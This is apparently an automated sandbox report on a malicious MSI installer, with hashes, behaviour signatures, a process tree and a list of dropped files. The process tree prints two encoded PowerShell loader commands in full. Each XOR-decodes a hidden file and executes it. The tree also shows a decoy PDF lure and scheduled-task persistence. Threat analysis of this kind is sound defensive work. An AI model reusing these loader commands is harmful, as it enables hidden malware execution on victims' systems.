Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
21-03-2023 11:44
General
-
Target
4808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51.msi
-
Size
166KB
-
MD5
fee3db5db8817e82b1af4cedafd2f346
-
SHA1
e6bcf68c7d55fc933e7a7e2ca1fb4e8fa1ad376d
-
SHA256
4808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51
-
SHA512
37bbe3176b6d793b2b140e6bb6989b322832bdd77869d86e071e7566902fa9f718a647c2fb347a8a79f1fd9b5d5fc376ba8ddfa516944c3134d351048853278c
-
SSDEEP
3072:cCZXtgABNBJ1BP5mUopW5KfTl6bmneDhZd31JHtb/B9:cedgABj3op+KrcrtZd31Ftb/B9
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 43 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 43 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A8A5D951D4CEC21574E920033C47ADB12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABpAG4AcwB0AD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAFcAaQBuAEUAdgBlAG4AdABDAG8AbQBcAHMAZQByAHYAaQBjAGUAXwBwAGEAYwBrAC4AZABhAHQAIgA7AGkAZgAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAaQBuAHMAdAApACkAewByAGUAdAB1AHIAbgA7AH0AJABiAGkAbgBzAHQAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAEIAeQB0AGUAcwAoACQAaQBuAHMAdAApADsAJAB4AGIAaQBuAHMAdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABCAHkAdABlAFsAXQAgACQAYgBpAG4AcwB0AC4AQwBvAHUAbgB0ADsAZgBvAHIAKAAkAGkAPQAwADsAJABpAC0AbAB0ACQAYgBpAG4AcwB0AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AGIAaQBuAHMAdABbACQAaQBdAD0AJABiAGkAbgBzAHQAWwAkAGkAXQAtAGIAeABvAHIAMAB4ADEAMwA7ACQAeABiAGkAbgBzAHQAWwAkAGkAXQA9ACQAYgBpAG4AcwB0AFsAJABpAF0ALQBiAHgAbwByADAAeAA1ADUAOwAkAHgAYgBpAG4AcwB0AFsAJABpAF0APQAkAGIAaQBuAHMAdABbACQAaQBdAC0AYgB4AG8AcgAwAHgARgBGADsAJAB4AGIAaQBuAHMAdABbACQAaQBdAD0AJABiAGkAbgBzAHQAWwAkAGkAXQAtAGIAeABvAHIAMAB4AEYARgA7AH0AOwBUAHIAeQB7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4AGIAaQBuAHMAdAApAHwAaQBlAHgAOwB9AEMAYQB0AGMAaAB7AH0AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABpAG4AcwB0ACAALQBGAG8AcgBjAGUACgA=3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Приказ Минфина ДНР № 176.pdf"4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uirtmoe1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES92DF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC92DE.tmp"5⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /TN WindowsActiveXTaskTrigger4⤵
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /RUN /TN WindowsActiveXTaskTrigger4⤵
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000004A8" "0000000000000594"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {5A0EE95C-AE4D-49B4-8573-E43679F24C77} S-1-5-21-1283023626-844874658-3193756055-1000:THEQWNRW\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\WinEventCom\manutil.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABtAGEAaQBuAD0AIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABXAGkAbgBFAHYAZQBuAHQAQwBvAG0AXABjAG8AbgBmAGkAZwAiADsAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABtAGEAaQBuACkAKQB7AHIAZQB0AHUAcgBuADsAfQAkAGIAYQByAHIAYQB5AD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAG0AYQBpAG4AKQA7ACQAeABhAHIAcgBhAHkAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGIAYQByAHIAYQB5AC4AQwBvAHUAbgB0ADsAZgBvAHIAKAAkAGkAPQAwADsAJABpAC0AbAB0ACQAYgBhAHIAcgBhAHkALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeABBAEIAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeABGAEYAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeAAzADAAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeAAxADAAOwB9ADsAVAByAHkAewBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeABhAHIAcgBhAHkAKQB8AGkAZQB4ADsAfQBDAGEAdABjAGgAewB9AA==3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1rrtllpq.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D60.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3D4F.tmp"5⤵
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5a6f9e0789f04395f98cb10ddb2757447
SHA1921efe216ef280d6d5f758d5e900e187b1c45e59
SHA256646ca6275d06209090e230310ae6a32e7d9bf47e5d13ef7ccec90f9ba8486b8c
SHA512334c88549b26826728e6d19116c2051073db5bfe5543576ec578f217254c6de4bd61281094ed0cc659e1b37e8592492a4316fb57c2904ee3e947e8465b2bb74d
-
Filesize
3KB
MD5573ad0911ddce78c25ec17871a4932e4
SHA1fb9b9911526a6db7a695a72954b083e2a8a68e8d
SHA256b811b95d0faa2ab03407d030d8898a4ffa6342f291fdb16c5ecb59b092c77c80
SHA512fa95e5efa42cc7e3ca7482291740b396491528f93cba24ad8d66d43d7d4bc755bf8c4f00e461d8b26dd96c8086c40763042de7e68bd58171dd617ff60d3fadad
-
Filesize
7KB
MD5d8062525da59a1c98223dd3dfe663574
SHA185571f762fc319c9eb64c122254bdda87cfff08e
SHA256e99462fcf30d6b280235cd48285a78c44c6ff4c0ac9521631e8e5860c2951218
SHA51284bff35fca18223016b63f9d20cb03917de55f7cd1b77c0f7065f919ad357d4dece9c9afb7f2b484e796a32e64f27fb96e7135c73774b41adfa7466ef4df17f6
-
Filesize
1KB
MD53e91fa3ec061c206305f47b571be5530
SHA1dade6db818991f42db906f13544c7a7dd9f4ffd0
SHA256f232cb4681b45dd8eda9195a320d3a423a4715e766c174e79db3c985cf41483d
SHA512e91bfa13d1c0363b38a353f61b764b5f13e7956bc7e2181e4f4c5eca7a90de9acd7ce355fc93a64319e9f4b4089d890152b6535d8c1b7383c20f7df053f99ef8
-
Filesize
1KB
MD5d43aa85e415be7c3fcd36c69bfd72584
SHA1e49e85afa42c75c1ba9d7fe5539f84d882989828
SHA256ffb4ee2dbbeafefe61cf5baaeca6741bacbd35e03a5901a64cb8b82c62a5badf
SHA5121e21f85b36d680c46d98dd86e60aa4a0b75789033b4138daf6cc800355926e91989a84cb71a935228910415b336ba42f1b9ea5a2fb504fbac84f95a36af72780
-
Filesize
3KB
MD5f1e0824f0c75833ba55264f0a11e0cc7
SHA185cf63652c285b699dd06b53b23d6b76c79c167c
SHA256966535f5727595dbff078178c9d3a77143c1b06e286f5f807554bb49327545e8
SHA51246e4e4920d40cb195a15bbdb1ffc4627567aee98b1bae8f46f66f3aab2327d3906336f48bf39ff6312bc688827b678869145d0a989bfe0ac78d86a8002ef046a
-
Filesize
7KB
MD527a0a5a0bc5a9f82e6d6d5ed1787f04a
SHA12283677e0aa4e4061cb0dcb2991c6cfc6a5e1c4c
SHA256862f2763c6bc0a52af262fc2b54b1066e6b626cf454a9d1fff5267619e06ee1a
SHA5128ea54d974baf43b570e683b4d2c9463b5679d84f421f7a6a28f8fca8b1edef49745c636c2148f86a7aecb75b5fdd9f3814ab07b6b466446dd7d0b1f1fbdc0a9a
-
Filesize
9KB
MD5ab4d7aae358846880050ea7e37f52ac7
SHA16c0f5abb5531cd47313b21e461b190f6a39676a0
SHA256ddf9f9cf92aa2cd47cd9aa708756e2233fbb0186480377ed6c37bdb66e0d1ec3
SHA5120a0bfae046028f5439b9c30cb32596da585f3d84fb38959b66510f999ae3d51330be7357c7b23ddd7a19882ab568e21459a99805f59a2ac5db31a6dd5f4e6dfb
-
Filesize
1KB
MD58c2f5e7432f1e6ad22002991772d589b
SHA18b04e7b1608b7498e06905e62f03f5e23687d9eb
SHA2565d008539c11d9e35e9851487e82a078bbf8a1bd19a7f5f1f5beb581b47c7ca91
SHA5127c7eac0081ff7ce07ba96cd11f36f04e3386f2a176b4357c53384b72b7fcd0deacc477a20b5264b8b39f47d9348a5a8069a8acfff5b2e8576629b933d66e6bc1
-
Filesize
111KB
MD579da5a4719f51837126bebd6c8f2714f
SHA136fbda3057119305f946a5f2949d442b33a3261c
SHA25637309f7ea1877775b1d33e4d8fd43f5bbd49758af2c0400785d860c8036a0598
SHA51201b6dcc10cf888084f4267b4bcc34e0b3b62ce50e09f903244757a819af83997b2fab9be755c464c89235f60f8c8383c272519950165dcad22f844266044935a
-
Filesize
7KB
MD55b48388594e3599a82b3fad6919da131
SHA1125fbe170cfa60271a3d681f2d5c46f5788a063e
SHA25653b1d92ef90972d12a7fda782fa0819d94b0ac6aa8220172a4d532859f4b49da
SHA512cd02dcec35c551436a63297d1cce5da13a932873f7f29b70d467fcf1fd391bd44d5812631ef9cefa1d60417505ca21e3e50e25e4ba842775ab335279fe66ceea
-
Filesize
23KB
MD5e1f0082cb3d04c4a2a70ae02a158520c
SHA133a7244d072cf1d530a26d7d77bfe88615661ecd
SHA256f405a26904d2f6aaf4ff5f24dc345a24751d13b691a0bf17ba8c94f08ebb8b5b
SHA5122cf6bb9ba1c443797328159004c2f63ef70363e72fc3fe9aaee4a73a2d95f73a56cc30b2597d8d643370babaeaac46b24dbe59237a3ab866b61f0cb7eac8f0ca
-
Filesize
111KB
MD579da5a4719f51837126bebd6c8f2714f
SHA136fbda3057119305f946a5f2949d442b33a3261c
SHA25637309f7ea1877775b1d33e4d8fd43f5bbd49758af2c0400785d860c8036a0598
SHA51201b6dcc10cf888084f4267b4bcc34e0b3b62ce50e09f903244757a819af83997b2fab9be755c464c89235f60f8c8383c272519950165dcad22f844266044935a
-
Filesize
166KB
MD5fee3db5db8817e82b1af4cedafd2f346
SHA1e6bcf68c7d55fc933e7a7e2ca1fb4e8fa1ad376d
SHA2564808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51
SHA51237bbe3176b6d793b2b140e6bb6989b322832bdd77869d86e071e7566902fa9f718a647c2fb347a8a79f1fd9b5d5fc376ba8ddfa516944c3134d351048853278c
-
Filesize
91B
MD5c7f3bc82767e125b120f23fe5856722e
SHA1e5143478a180c2bcc49034dae6536be2f7f7bb94
SHA256f4e73f33fe74d354b87e76f481dbb2b12610820a308440c316b84ba0b4996c98
SHA512fe480b21ec99713d5178d79db5f3129a0fc6d06d76e423c02623315453ad8224ea689bc53859da716dc7ecfcf41ec7832ca69f8088ace264c8967cf4ca4d8f98
-
Filesize
309B
MD579259fe74a06b2a8d53af3b981afc737
SHA1ba08cc8810d09414fd5d90255c39e3f4378cd9a0
SHA256caa66dcf9672fb9f114292923f3d3b7692cf89504fb1009e10ac35000f404a0f
SHA512e24c5d977301d08b3785a1a7092a2f35f5cddee486fca42dfe167e1ec6d7c3a64a79c78f7db004c39d73880133cb24f6b619994afb7c96f5a2223a0ce5f2f04d
-
Filesize
652B
MD53ad448d5a3d278b1143b590281325ffc
SHA1c583f5312258a1e299d441248d3e951b6293356c
SHA256db58c1c6b02252a291915918512a0469eb0614ab54d1351b52c532e686b7c559
SHA512d33515e5aaa7940267fd2f627e41ab03692f255848c27a3f1318f462388648ba45d84b8a7a61020734095b449a20c907dc647ce3068ce0608ba499c28980937b
-
Filesize
652B
MD575003770d652a0e11386dc9a920c93e5
SHA1a369078c866e65cd7112e154f57aa956373e0973
SHA256912f13c08fe1a1430c312f9fd04c49b40907c966dbb6b00445165480ed13e83d
SHA5129636a01d070032def98cded61b80fd1535c18017e2221fb7709ca2307e522b9768a70d12b223932f8307fa7bba0d0e32798df5278795110476f5e164b9020017
-
Filesize
363B
MD51c84f1b08df842fa8b588b11f9221c94
SHA17dff1d05dfd1baa79823326f8b88598dd5cf5b6c
SHA256c4e2044972dd7206a6561117d972945f2d4330072d4c7feea861c785576f9d16
SHA5124b89ca9d512b1c713d6a8cb0fbb057e46493766452a850734f990bebabb00c78a12749e1dda6aa8ee4f00a0c35b7af93ae627c4e1b68b0eaca47e6b37b4bb502
-
Filesize
309B
MD5e386883de645354b4278a5058ffe52af
SHA1f763774689db433266e6f6ecfaccf510c68e4cd2
SHA2563b64ea35090b53c1533efcb293565a206a51d0426a0812bf59c758c53f8c3d25
SHA5127af53646641f1bb92031d3a2a750533ff3f0cfa28740953089cf3a149dd9af766f3ab4d99ce41f94ce37ac6be1dbaa78d14f8f81731d71b0a4e786245f66fa61
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB